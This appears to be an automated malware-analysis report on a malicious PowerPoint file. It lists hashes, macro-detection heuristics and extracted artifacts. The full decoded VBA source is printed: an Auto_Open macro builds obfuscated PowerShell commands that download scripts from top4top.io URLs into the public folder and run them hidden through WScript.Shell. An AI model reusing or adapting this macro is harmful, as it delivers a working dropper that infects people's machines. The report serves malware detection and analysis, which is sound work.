Office (OOXML) malware analysis — malicious · 61adeded547af27c

MALICIOUS

Office (OOXML)

9.8 KB First seen: 2020-10-31

MD5: 1cea61eb4a97ca0896ed03caefde01a0 SHA-1: 7e6771b92bd1e526522e1860cfa25cf9c9ae7a92 SHA-256: 61adeded547af27c6c8d0a4a0d33906ae43f67f5e646f768d4c6f3de53bb9943

310 Risk Score

Heuristics 9

VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    objvzrmrij.CreateObject("WScript.Shell").Run hrekxd, 0
```
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER

The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
Matched line in script
```
Sub Auto_Open()
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    objvzrmrij.CreateObject("WScript.Shell").Run hrekxd, 0
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
    Set objvzrmrij = GetObject("new:" & OUTLOOK)
```
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA
Matched line in script
```
fnaggmjylhu = "cmd.exe /c" & "CmD cmraxlq" & " cmd " & "/r" & _
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://l.top4top.io/p_1759vkx3k1.jpg�� In document text (OOXML body / shared strings)
- https://b.top4top.io/p_1759qjyvx1.jpg��In document text (OOXML body / shared strings)
- https://l.top4top.io/p_1759vkx3k1.jpg�In document text (OOXML body / shared strings)
- https://b.top4top.io/p_1759qjyvx1.jpg�In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2091 bytes
SHA-256: `ea136101906d3424435064ace25268ac7745fb8ec13a303a9fdc961886f21cb2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Módulo1" Sub Auto_Open() ps rQQhFuWy End Sub Public Sub ps() On Error Resume Next Dim lll As String lll = "c" a = Left("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1) b = Left("PHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1) 'Right function c = Left("OHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1) 'Mid function q = Mid("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1, 11) 'Split function d = Split("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", " ") For Each wrd In d strg = strg & wrd & ", " Next fnaggmjylhu = "cmd.exe /c" & "CmD cmraxlq" & " cmd " & "/r" & _ b & c & "wershell " & "(NEw-objE" & lll & "t " & "system.net.wEBclIenT).DownLoAdfIlE" & "( ”https://l.top4top.io/p_1759vkx3k1.jpg” , ”$ENv:public\g.ps1” ) ; " If LYSC = 0 Then 641: vzrmrij (fnaggmjylhu) Else End If End Sub '------------------------------ Public Sub rQQhFuWy() On Error Resume Next Dim lll As String lll = "c" a = Left("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1) b = Left("PHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1) 'Right function c = Left("OHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1) 'Mid function q = Mid("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1, 11) 'Split function d = Split("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", " ") For Each wrd In d strg = strg & wrd & ", " Next fnaggmjylhu = "cmd.exe /c" & "CmD cmraxlq" & " cmd " & "/r" & _ b & c & "wershell " & "(NEw-objE" & lll & "t " & "system.net.wEBclIenT).DownLoAdfIlE" & "( ”https://b.top4top.io/p_1759qjyvx1.jpg” , ”$ENv:public\qawsplsqfr.vbs” ) ; stARt-PRoCESs ”$ENv:public\qawsplsqfr.vbs”" If LYSC = 0 Then 641: vzrmrij (fnaggmjylhu) Else End If End Sub Sub vzrmrij(hrekxd As String) Const OUTLOOK = _ "{0006F03A-0000-0000-C000-000000000046}" Set objvzrmrij = GetObject("new:" & OUTLOOK) objvzrmrij.CreateObject("WScript.Shell").Run hrekxd, 0 End Sub Function SjVht(ByVal SahaAFUTvE As String, ByVal EdTUWuwZhZ As Integer) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: ppt/vbaProject.bin	23040 bytes
SHA-256: `084e677885f1894e67400a162bd0feafa9bb55c85ad5d1676e02881043fcb020`

Open this report in the interactive analyzer, or submit your own file for analysis.